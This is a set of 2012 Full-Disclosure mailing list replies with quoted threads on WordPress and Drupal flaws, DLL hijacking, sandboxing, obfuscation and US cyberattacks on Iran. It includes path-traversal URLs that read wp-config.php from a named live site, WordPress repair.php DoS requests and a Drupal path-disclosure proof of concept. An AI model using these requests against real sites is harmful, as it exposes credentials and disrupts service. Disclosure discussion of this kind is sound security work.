So this plugin supposedly helps securing a website? ... On Tue, Aug 28, 2012 at 10:50 AM, Henri Salo he...@nerv.fi wrote: On Tue, Aug 28, 2012 at 10:29:46AM +0200, Jan van Niekerk wrote: This wordpress security plugin lets you read arbitrary files on the system. Looking at the code, there will be plenty of stuff like this. Demo: http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-config.php http://www.cloudsafe365.com/wp-content/plugins/cloudsafe365-for-wp/admin/editor/cs365_edit.php?file=../../../../../wp-login.php Disclosure timeline: * Today: visit wordpress.org * Try to report bug * System wants login * Visit web site: vendor has no e-mail address and stupid one-liner contact form and hidden name * Stuff it, I'm not going to phone them I can verify and report this. Could you list all the vulnerabilities you can find from the plugin? You can also contact plugins@wordpress.orgaddress in case you found vulnerabilities from WordPress plugins in the future. - Henri Salo ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DLL Hijacking Against Installers In Browser Download Folders for Phish and Profit
I've got two concerns about this: 1. Either way you put it, I can't see how one can make a convincing argument out of downloading a DLL file. Asking laymen, they'd ask what's a dll for? weren't updates done with exe/msi/etc? why's it got that funny icon? 2. I'm a bit curious about your choice of code, and why you commented out exit(0); (what's the point anyway?) Cheers, Chris. On Mon, Aug 13, 2012 at 7:19 PM, Gynvael Coldwind gynv...@coldwind.plwrote: Well, what can I say - your write up is accurate. Though last time I've seen it, around 5 years ago, it was still called DLL spoofing and not DLL hijacking, and was one of the arguments why carpet bombing (automatic download) in Safair/Chrome must be fixed :) E.g. http://gynvael.coldwind.pl/?id=55 -- gynvael.coldwind//vx ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] sandboxed browsing
I use Internet Explorer 6 on Windows XP, obviously! On a more serious note, I doubt there's a safer alternative, except maybe not going there in the first place (or just wget-ing it instead). On Wed, Aug 1, 2012 at 1:38 AM, Kyle Creyts kyle.cre...@gmail.com wrote: Who uses something other than a browser in a virtual machine to follow suspicious/possibly malicious links? If you do, what do you use, and how did you choose it? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] sandboxed browsing
Uhm, there's countless ways to download a file through HTTP on Windows. To be honest, I don't trust sandboxie at all. I think, and I'm sure many agree with me on this one, a VM would be much better than sandboxie at this point. That said, I suppose there is still a chance of malware getting over your VM OS and infect your main one through the network, or the malware to be able to somehow escape your VM into the host. Either way, I think the best bet would be wget or similar. On Wed, Aug 1, 2012 at 3:14 PM, Andreas mailinglis...@lanworkx.org wrote: well, for windummys there's http://www.sandboxie.com/ or even better: linux Zitat von Kyle Creyts kyle.cre...@gmail.com: Who uses something other than a browser in a virtual machine to follow suspicious/possibly malicious links? If you do, what do you use, and how did you choose it? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] A modest proposal
For what it's worth, I wrote a system in the past whose code changed on each generation. I did it mostly as an exercise, but it seemed to worked well. It had two different layers; an obfuscation layer and a code modifier layer. Obfuscation worked like you would expect today; substituting function/variable names etc. The second layer actually changed the code with functionally equivalents (as Valdis mentioned). However, I disagree with Valdis' points about the opcodes. Seems his interest lies in fixing a potential issue. I beg to differ, this concept isn't about fixing existing code, but rather leave it as is (with the existing bugs). From a development perspective, if a bug comes up in the end system, it will be much harder to debug since function names etc won't correspond with the original code. You might want to put some sort of logging mechanism to figure out these bugs, but it defeats the purpose of hiding code in the first place. My two cents. On Fri, Jul 20, 2012 at 9:48 AM, Thor t...@hammerofgod.com wrote: There's no need to insult him like that. The idea itself may be a bit lacking in overall effectiveness, but it certainly isn't childish. t On Jul 19, 2012, at 11:55 PM, Memory Vandal wrote: On Fri, Jul 20, 2012 at 6:38 AM, Glenn and Mary Everhart everh...@gce.com wrote: Hello, FD... A thought occurred to me: Why not use the same kind of polymorphism and software metamorphism that is used by malware writers as a protective measure? So you want to make a Batman malware? I would say its nice thought but still childish. MemoryVandal ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] A modest proposal
Wow, how short sighted. So you really think that obfuscating code is a good excuse to escape reviewing of bad code? With all that trouble, you could just write it correctly from scratch (or give it more time for testing). But at this point, I think everyone is getting their own deal out of this. The original idea does not work for each and every case, and it definitely fails badly in some specific cases...this however, does not discredit it at all. On the other hand, if all you really care about is trolling...well, that's another different story. On Fri, Jul 20, 2012 at 4:01 AM, Bzzz lazyvi...@gmx.com wrote: On Thu, 19 Jul 2012 21:08:47 -0400 Glenn and Mary Everhart everh...@gce.com wrote: If you have a piece of code that you don't want malware to be able to inspect, that might perhaps have some secrets in it or that you want not to be trivial to have some other code patch, why not arrange for that code to be different in form (but the same in function) with every copy? It isn't very realistic because wherever you put the code, in whatever native form, you first have to decode it to RAM for execution; and if this code is a piece of crap, it'll stay a piece of crap. Furthermore, obfuscation can talk to you when you're used to review tons of code (haaa, apple][ nibble counts and other protections, where did ou go?:), and sensibly slows down programs responsiveness. The base of the problem isn't obfuscation but producing good and tested code, AND reacting fast when a flaw is discovered. This is what most of open-source coders fight to do and what big corps strive to avoid. In this matter, everybody's here knows that threatening these corpos of a full disclosure is the only way to go, because they're like kids that won't grow up and seek the least effort possible max benefit way - in a word, they're irresponsible. JY -- lily34 were made one for each other lily34 we'll marry lily34 we'll have many children EthanQix :/ lily34 like Roméo and Juliette :D EthanQix hmmm you apparently didn't finished the book. lily34 ? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
All this talk about a lot of arguments to syscalls reminded me of `ls`and that's just the beginning.. Let's be honest, no matter the amount of standardization (or plain planning) you put in, there's always room for complications. In what I've seen, the only exception here, is a dozen or so small hobbyist OSes. On Mon, Jun 11, 2012 at 1:58 AM, Dan Cross cro...@gmail.com wrote: On Sun, Jun 10, 2012 at 7:22 PM, Benjamin Kreuter ben.kreu...@gmail.com wrote: I am a bit surprised by the direction of this conversation and I have been waiting for someone to say the obvious in regards to protecting yourself from .gov malware, it really is quite simple if you think about it. Stuxnet, duqu, flame, ect.. all only run on windows platforms. If the people you are protecting are concerned about that kind of malware (and they should be) it would be a great time to tell them about GNU/Linux, BSD, ect.. Which would do little to protect anyone. Do you really think that GNU/Linux would be a more difficult target for the NSA (or whichever agencies were responsible -- I would guess the NSA, but there may be others)? GNU/Linux machines are compromised by criminals all the time, and the majority of people would not be willing to put in the effort needed to keep their system secure. There are probably a bunch of remote exploits in the Linux kernel, in Firefox and Chrome, in OpenSSL and NSS, in Ghostscript, and in any of the thousands of other packages that will be installed on a typical GNU/Linux system. There is no magic bullet here. Security is not about running the right OS, it is about running your OS the right way (and more). Telling people that using GNU/Linux will make them safe is silly. Fundamentally I agree with you, security isn't about running the right OS, etc, we should acknowledge that not all operating systems are the same. Windows is fabulously complex, with a really large number of system calls, many of which take a large number of arguments that in turn change the semantics of the call greatly. Together, these represent a very large surface area for potential attacks. In turn, many of the Unix variants are simpler; they may not be any more secure, but at a minimum, they have less attack surface area. Of course, it's been my impression over the last couple of decades that they're trying as hard as they can to fill the gap. To put it in military terms, the Unix variants have traditionally had more surfaces and fewer gaps than Windows. Anyway, this isn't to say that Unix or some variant is inherently more secure, but all other things being equal, I'd rather put my money on the simpler thing, since simpler is often easier to get right. Whether that's really the case or not is another matter; I simply wanted to point out that there are other arguments beside the flawed, security through obscurity that may come into play when deciding between operating systems with respect to security. - Dan C. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks
Yes, let's just forget Iran would strike any country against its religious views, especially Israel. Then again, we can take Iran's word for it - they won't attack anyone unless they really had to. On Sat, Jun 9, 2012 at 12:08 PM, John Doe jd731841...@gmail.com wrote: On Fri, Jun 8, 2012 at 1:58 PM, Laurelai laure...@oneechan.org wrote: And that brings us back to what are we going to do about the US Gov laying down in the same mud as the bad guys Good and bad are just points of view, mostly of whether YOU benefit or not. Ian Hayes cthulhucall...@gmail.com wrote: There are those out there in power who only know the language of brute, naked force The murder of civilans is certainly a terrible crime, but that and the release of some malware that breaks centrifuges is certainly better than other options. Pre-emption of potential, predicted or foreseen violence with violence does not justify the violence or make it right. The right option would be to respect their rights and leave them alone, but strategy game-theory playing americans won't allow that, as Iran is the weak kid on the block and the fatsos want him to give up his candy. Not that the fatso really needs the candy, it's more of a habit of bullying. USA hasn't delared war on Iran. Congress has not authorized acts of war against Iran, has it? -- If Obama has, he is acting as a rogue agent of USA, a terrorist - if you will, hell bent on killing civilians with his assassination lists, cyber weapons and drones. As such, he should be held liable for any damages, just like americans would hold any terrorist liable for attacking them with similar means and weapons. How would Obama feel if Iran sent a drone to bomb and kill his kids and family at a kindergarten, just because they thought he might be there? Would it not be just as justified a killing as his strikes have been? It might even pre-empt some of his drone bombings or cyber attacks in the future! Laurelai wrote: I don't see how Iran developing nuclear power is a threat, I'm sorry to me this just seems like more fear mongering. musntl...@gmail.com wrote: And is this how you fail. There is no problem is in developing nuclear POWER there is problem when you is weaponize it. Problem is not weapons either. It is game theoretic positioning. Bullies who let the weak and robbed get guns end up regretting it when the weak can defend themselves and can no longer be robbed and bullied. This is what bullies don't like. This is why americans and USA whine about Iran, because they bully Iran for it's oil and gas resources, - the candy. I think the major problem here is that USA, and indeed some americans, are unwilling to give others the same benefits and equal rights, which they enjoy themselves on the free markets of the world. To which they have agreed. Iran is a signator of the Nuclear non-Proliferation Treaty and as such has every right to use and to develop nuclear power to peaceful purposes. Indeed, USA was the one supplying them with 18 fast breeder nuclear reactors not so very long ago. Iran should sue USA and Obama for terrorism on any international, civil and class action courts for damages to any cyber menaces they've been unleashed upon by Obama. There is no justification for their illegal attacks against Iran. If Obama has authorized these acts of war, then he should be held liable for any civilian or corporate damages as well as charged with terrorism. I would imagine that in these cases the damages run easily in the billions. This is the right solution for cyber terrorism. Take them to court! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
What's the real problem Laurelai? If the US abruptly vanished, there will be another country taking its place as the global player. The thing is, I can't imagine another country doing a better job than the USnot because the US is a walking saint, but because the rest of them are no better. Back to the subject of the US playing dirty, who gives a shit? Security experts of all shades have been doing it. Now that the US is taking your place you're worried? On Sat, Jun 9, 2012 at 5:01 AM, Laurelai laure...@oneechan.org wrote: On 6/8/12 9:56 PM, Jason Hellenthal wrote: Shit, Ill give the NSA a shell on any system... if it means achieving a greater goal. Whether its wrong or not... let the bots decide who is the better player as long as it brings the US into a primary position of power. On Wed, Jun 06, 2012 at 11:22:32PM -0400, Laurelai wrote: On 6/6/12 2:23 PM, Peter Dawson wrote: haha..da retrun of da farewell dossier !! On Wed, Jun 6, 2012 at 2:21 PM, coderman coder...@gmail.com mailto:coder...@gmail.com wrote: On Wed, Jun 6, 2012 at 11:16 AM, coderman coder...@gmail.com mailto:coder...@gmail.com wrote: ... uncle sam has been up in yer SCADA for two decades. three decades; too early for maths! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Guys can we focus on the fact that the US Government is en mass accessing computer systems without due process, and trying to prosecute the people who made this known to the public. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Here we have a real life example of someone who is a part of the problem. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Obama Order Sped Up Wave of Cyberattacks Against Iran
There are so many flaws about your argument, I don't even know where to start. Then again, most arguments were pointless, so instead, I'll iterate my previous one; all this sensationalism about the US is just bullshit. Other countries are doing this, and kids at home even help out. Heck, I'm more concerned with how modern day kids are so gullible into thinking they're doing something great by bringing down a website. On Sat, Jun 9, 2012 at 2:55 PM, John Doe jd731841...@gmail.com wrote: I'm sure the Nazis were thinking alike. The jews kept whining, but then again, they were the arab terrorists of the time.. And now we have americans wondering why the arabs won't go into the ovens without whining. More to the topic, I'd hope USA would LEAVE THE CIVILIANS OUT OF THEIR FUCKING WARS, and honor the treaties thereof, like they should. And I don't mean the verbal shit how we don't torture or we don't kill civilians but I mean the actions themselves. Verbally lying about not torturing does not equate to honoring the treaty against torture, for example. This, americans just don't seem to understand. The treaties obligate and bind all americans to honor them. And not just verbally, but in your deeds as well. And this includes cyber wars. They just work to disrupt the internet even more and it does not do good to economy or the productivity of people. Internet and computers working without problems create bigger economic growth than USA disrupting them with their cyber weapons and wars. On Sat, Jun 9, 2012 at 3:31 PM, Christian Sciberras uuf6...@gmail.comwrote: What's the real problem Laurelai? If the US abruptly vanished, there will be another country taking its place as the global player. The thing is, I can't imagine another country doing a better job than the USnot because the US is a walking saint, but because the rest of them are no better. Back to the subject of the US playing dirty, who gives a shit? Security experts of all shades have been doing it. Now that the US is taking your place you're worried? On Sat, Jun 9, 2012 at 5:01 AM, Laurelai laure...@oneechan.org wrote: On 6/8/12 9:56 PM, Jason Hellenthal wrote: Shit, Ill give the NSA a shell on any system... if it means achieving a greater goal. Whether its wrong or not... let the bots decide who is the better player as long as it brings the US into a primary position of power. On Wed, Jun 06, 2012 at 11:22:32PM -0400, Laurelai wrote: On 6/6/12 2:23 PM, Peter Dawson wrote: haha..da retrun of da farewell dossier !! On Wed, Jun 6, 2012 at 2:21 PM, coderman coder...@gmail.com mailto:coder...@gmail.com wrote: On Wed, Jun 6, 2012 at 11:16 AM, coderman coder...@gmail.com mailto:coder...@gmail.com wrote: ... uncle sam has been up in yer SCADA for two decades. three decades; too early for maths! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Guys can we focus on the fact that the US Government is en mass accessing computer systems without due process, and trying to prosecute the people who made this known to the public. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Here we have a real life example of someone who is a part of the problem. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DoS vulnerability in WordPress
Honestly, you'll be doing a favour to everyone in the universe and yourself if you learned (to write) some proper English. On Fri, Apr 20, 2012 at 10:50 PM, MustLive mustl...@websecurity.com.uawrote: Hello Kurt! First off all, WordPress developers lay that they made automatic database repair against the vulnerability, which allowed two attacks - DoS and full site takeover (at presence of the installer). Since WP 2.9 (in December 2009) it's still not automatic, so still all versions of WordPress are vulnerable to Tables Corruption Attacks, which I've described in May 2009 (turning 'WP_ALLOW_REPAIR' will not make it automatic). Second, such functionality as in repair.php, which overloads the DBMS (and so every site on the server which uses this DBMS), must be under authorization (and not to every logged in user, but admin only). WP developers haven't did it, but they decided to make such silly method of protection against attacks on this functionality. By default it's off, so admins and their sites protected from attacks on it (and have no advantage from this security functionality). When admins will decide to turn it on, like when the problem with DB occurs or just for testing of this functionality or because they believe in developers words that it's automatic database optimization (including repairing of the tables), so for reliability they turned it on, they will receive new vulnerability at their sites. Admins could left this option on for different reasons: forgot to turn off, was busy and decided to turn it off later, have tables crash all the time, so it's easier to turn it on one time and other reasons. For example, besides WordPress I've wrote about analogical vulnerabilities in IBP 1, 2, 3 (which could lead to DoS). And since IPB 2 there is a functionality - not protection against tables crashes, nor automatic database optimization, but just functionality in admin panel for repairing DB - which can be used to quickly recover forum after tables crashes. It's accessible only to authorized admins - how it should be made. Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua - Original Message - From: Kurt Seifried kseifr...@redhat.com To: MustLive mustl...@websecurity.com.ua Cc: submissi...@packetstormsecurity.org; full-disclosure@lists.grok.org.uk Sent: Monday, April 16, 2012 10:11 PM Subject: Re: [Full-disclosure] DoS vulnerability in WordPress -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 04/15/2012 02:55 PM, MustLive wrote: DoS (WASC-10): By constantly sending requests to script http://site/wp-admin/maint/repair.php (functions Repair Database and Repair and Optimize Database) it's possible to create overload at the site (and the whole server). And the more data in site's DB, the more load from every request. http://site/wp-admin/maint/repair.php?repair=1_wpnonce=a4ca36d5ff http://site/wp-admin/maint/repair.php?repair=2_wpnonce=a4ca36d5ff The attack will work at turned on WP_ALLOW_REPAIR in wp-config.php. Protection against CSRF (tokens) is bypassing, because for using of this functionality the authorization isn't required. So it's possible to get _wpnonce remotely and to conduct DoS attack. This appears to be intended functionality, by default I get: To allow use of this page to automatically repair database problems, please add the following line to your wp-config.php file. Once this line is added to your config, reload this page. define('WP_ALLOW_REPAIR', true); So either an admin has to specifically configure this to allow it anonymously, or exploitation requires administrative access. I don't see any trust boundary being violated here. - -- Kurt Seifried Red Hat Security Response Team (SRT) PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993 -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQIcBAEBAgAGBQJPjG77AAoJEBYNRVNeJnmTKWUQAIE5a0yRHp3AZMKhc1aCWYKb BgCvGp6qD+54kNvjYcGqfGh6LalZJeYm/1zYMtWyrXFptlCElCobDfWvVS5EUx3X gSwyIgrh630Iy1IEpwdmAZzBGQ/wiHx3E+00zvNrbyeGzrHdiem6+zT1A/EbElum d5wga4iyctFFkdCCIfbE9YfLzGyZG0CGjNNyR9EuURQ2RPJV9ldfrCjtjD4jIqI3 PBIcMzfysDMIqLRXB8Tf+462Ux4iHW/FieXOaoG0N+1+Gq+P3/spBJlMOG6AWGzl h7/yQbsCbFzYTL5mFWaZu18BGXx6MjzW0IliZ/Q70T6AHsuaEiEqKmEVbbbd/Com JyayQu7NyA8fuBhq1KRCrA3WjrAEfsV/yLQXVMsSdtbWodHpZ5RjFqhX95aBE9Ld CWtheuTm1xSuVVYq92VaJlT2aHlE/LK/nfSMPMqx1xBOHl1VbhuOvFVON6UIIYXg mPuYjmWXLIaEGYn6k8ZRcXCbZIvnPYPF3T1Jkp03m7RCCbMiQ1C7FQ65vmFwKtEi MqdoCcNWQIn4dM6Tb4/AwFDCj6Du+mJSusZvOCfMQt38GDES+iqndZAtXJ0YRUJG tES9pMq9NzeqtqyExROQFaoecLNHeJeWGQWLCrusUT5mdEHpjnl+WOkq+skUC1EJ khftjrd8KsbyNfGWN7/H =yegM -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter:
Re: [Full-disclosure] PcwRunAs Password Obfuscation Design Flaw
So, it seems it dawned on everyone that current computer models are fundamentally flawed. The protection we're trying to add is, at this point, one huge hack attempt to get things right. Do I have a specific solution? No. But I do think rethinking the wheel might be worthwhile. This would include forgetting POSIX for a minute and think what could be improved without relying on religious zeal. Yes, I know it's hard, but it's for the betterment of humanity! I hope... Chris. On Thu, Mar 29, 2012 at 3:20 AM, b b...@advisoryalerts.com wrote: So I guess what I am hearing from you and the other members of the list is that this problem can pretty much only be solved to provide complete security* except from physical attacks by having an operating system that is mathematically proven to do x, y, and z functions and only x, y, and z functions such that userland code could not ever get system level access to read arbitrary points in memory; and the operating system would have to provide a facility to userland programs for secure credential storage and the OS would enforce only certain programs (verifying using cryptographical checks that said program is indeed said program) would be able to obtain those credentials (and only in memory); and in addition to all of that the decryption key for the secure credential storage mechanism's database would never be stored on disk and would have to be entered by an administrator on system bootup? * I realize some of you may gawk at the use of that term, but I'm not sure what else to say there for complete security. -B -Original Message- From: Thor (Hammer of God) [mailto:t...@hammerofgod.com] Sent: Wednesday, March 28, 2012 11:30 AM To: b; full-disclosure@lists.grok.org.uk Subject: RE: [Full-disclosure] PcwRunAs Password Obfuscation Design Flaw You've well-articulated a problem most (if not all) of the implementations I've seen just dance over. The application accomplishes the encryption requirements stipulated by policy or regulation, but the key is easily available to the application and of course to attackers. I have no idea what mitigation techniques are available for PHP, but in .NET/Win applications there are a couple of first step attempts to at least address the problem. First you've got DPAPI, which in its simplest form is an API that allows the application to encrypt/decrypt data by way of keys stored in the system certificate store which is protected by a different set of credentials. The attacker would have to get system to get to the keys. Of course, if the attacker could alter code as you've outlined, then they could very well just use the API to decrypt data without worrying about getting the keys themselves. The problem with DPAPI is that it is system-based. The data encrypted by that system can only be decrypted by that system. That won't work in distributed environments, and it can be problematic in system failure scenarios. To get passed single-machine issues, there is another method called DKM, which as the name infers is a distributed key management system based on AD and the machines' membership is appropriate groups given access to the keys. So in a similar fashion, keys are protected by secondary credentials at the machine level. Again, this requires an attacker to gain system access to get the keys, but again, gives an attacker with file-level access where code can be changed access to the procedure calls to get the data if they have to. It is a very difficult problem to solve, but it all comes down to risk management. If you are protecting against off-line attacks or attacks from other systems, DPAPI or DKM will definitely help. If you are protecting against attacks where SYSTEM access is granted, it gets far more difficult (one may even say quite improbable) to protect the keys. What I've been doing myself is a bit different, but it ultimately suffers from the same potential issues: As part of my TGP suite, I've extended functionality to WinMobile so that data encrypted on the PC can be exchanged and decrypted on the phone. It's pretty cool actually... to get around the key management issues, I wrote an API where the devices authenticate to, and use certificates to gain access to the encrypted keys on a centralized key store. On the phone, the calls are made each time keys are needed. On my web servers, the call is actually made on application startup, storing the keys in memory.At any time one becomes aware of some breach, you can cut off access to the keys. Not ideal of course, but it works. I'm not worried about the BSOD scenario. The remote attacker would have to cause a BSOD, and then somehow access the dump. In production systems, the page files are typically kept on another drive (well, maybe not typically but that is up to the admins) in which case the dump won't exist. But to your point, I just looked at my
Re: [Full-disclosure] Brute Force vulnerability in WordPress
How do you propose fixing this vulnerability? Error: Just pick another usernamewe don't like the one you chose. Brute force wouldn't work (would be infeasible) if wrong logins would take slightly longer to process (say, 2 to 5 seconds) as well as throttling login attempts. But again, this is a login issue, definitely NOT abuse of functionality by bruteforcing logins. Hell, I could bruteforce logins with a single google dork... there's no point protecting against the inevitable, especially when the protection is causing a huge disservice for absolutely no reason. Chris. On Wed, Mar 28, 2012 at 11:43 PM, MustLive mustl...@websecurity.com.uawrote: ** *Hi Zach!* Yes, it's also a vulnerability. It's Abuse of Functionality, which allows to enumerate logins. And during 2008-2011 I've wrote about all existent Login enumerations and Login leakages in WordPress (including this one). And also in many other web applications. Such vulnerabilities are also widespread like BF, but less then BF. I've found many web sites and web applications, where there was BF, but no Login enumerations or Login leakages. So they are less widespread, but also ignored by developers, even more then BF holes. Knowing logins is vital for Brute Force attacks and if logins are hidden it's not just 50% more secure (as some developers like to say about 50% less secure with leaked logins), but it's make BF almost impossible. Because with unknowing logins it'll be needed to pick up passwords blindly (with using of common logins), which will be unsuccessful in 99% cases. But there are web applications where logins are not needed - it's webapps with only one password field (there were many such webapps in 90-s and first part of 2000-s) and with fixed login (which is the same as only one password field), like Adobe ColdFusion, about this and other holes I've wrote last year. Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua - Original Message - *From:* Zach C. fxc...@gmail.com *To:* InterN0T Advisories advisor...@intern0t.net *Cc:* MustLive mustl...@websecurity.com.ua ; full-disclosure@lists.grok.org.uk ; submissi...@packetstormsecurity.org *Sent:* Monday, March 26, 2012 3:05 AM *Subject:* Re: [Full-disclosure] Brute Force vulnerability in WordPress He also considers it a vulnerability to tell a new user that the username they've picked out has been taken by another user. On Sun, Mar 25, 2012 at 3:09 PM, InterN0T Advisories advisor...@intern0t.net wrote: Same type of vulnerabilities exist in 99,999...% of all web applications including your website. Even if you can't bruteforce all the time, you can adjust it with timing, and e.g., proxies, different user-agents, etc., and then you have Timed Bruteforce Attacks which works on pretty much all websites. Did you also mention this 5-10 years ago on your web site about website security named websitesecurity.com.ua? Also, when will you stop posting about: bruteforce/full path disclosure/locking actual users out/and other low priority vulnerabilities that exist in most web apps, and completely move on to vulnerabilities that matters? Seriously, anyone can find these vulnerabilities and the reason why anyone hasn't reported / disclosed / complained about them is because they exist in most apps and doesn't compromise the security of the end-user nor the website. Will the next thing you disclose be about bruteforcing SSH because it by default doesn't lock users out? It's been like this for +10 or +20 years. What I find funny is that either you: A) Say a web app has a vulnerability because it doesn't lock the offending user out because of too many password tries, OR B) Say a web app has a vulnerability because it does lock out the offending user because of too many password tries. It's almost a contradiction and an endless evil circle. You can't have both, ever. No offense intended of course. Best regards, MaXe On Sun, 25 Mar 2012 23:45:33 +0300, MustLive mustl...@websecurity.com.ua wrote: Hello list! There are many vulnerabilities in WordPress which exist from version 2.0, or even from 1.x versions, and still not fixed. So I want to warn you about one of such holes. It's Brute Force vulnerability via XML-RPC functionality in WordPress. - Affected products: - Vulnerable are WordPress 3.3.1 and previous versions. -- Details: -- Brute Force (WASC-11): http://site/xmlrpc.php In this functionality there is no protection against Brute Force attack. At sending of corresponding POST-requests it's possible to pick up password. Note, that since WordPress 2.6 the XML-RPC functionality is turned off by default. WP developers did it due to vulnerabilities (such as SQL Injection and others), which were found in this functionality, i.e. not motivating it
Re: [Full-disclosure] Drupal 7.x Search Module - Full Path Disclosure
It would take an incredible effort for todays powerful frameworks to simply typecast user input as required. Either that, or it's PHP's fault (as the Python people would say). On Wed, Mar 14, 2012 at 3:46 PM, Ferenc Kovacs tyr...@gmail.com wrote: On Wed, Mar 14, 2012 at 2:39 PM, Ursu Mihail mishka.u...@yahoo.comwrote: Drupal 7.x Search Module - Full Path Disclosure == Summary Full path disclosure due to insufficient input validation in the search module. == Description Performing a search with the keys parameter set as an array, an error message shows the full path of the Drupal installation, leading to possible further attacks. For the error messages to be displayed, php.ini's display_errors must be On. Authentication: Not Needed == Mitigation Correct input validation for the key parameters == Exploit PoC example.com/?q=searchkeys[]=securitate.md == Affected Versions Versions 7 7.12 are affected. Not tested on 6. == Credits Ursu Mihail [ http://securitate.md ] == Disclosure Timeline Reported to vendor on 1 Mar 2012. Response from vendor: Disclosure of the path is not considered a security risk. Drupal has a configuration setting which allows PHP warnings to be printed to the screen for debugging purposes... For production websites, it is a good idea to turn this off, and the messages will not be displayed. == Comments Unfortunately for them, many sites display errors in production. == ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ btw. thats a pretty common problem. I also reported a similar issue a while back about https://dev.twitter.com/search/apachesolr_search/api?page[]=123 it seems that the apachesolr_search drupal module also vulnerable. :/ http://code.google.com/p/twitter-api/issues/detail?id=2271 -- Ferenc Kovács @Tyr43l - http://tyrael.hu ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The Mystery of the Duqu Framework
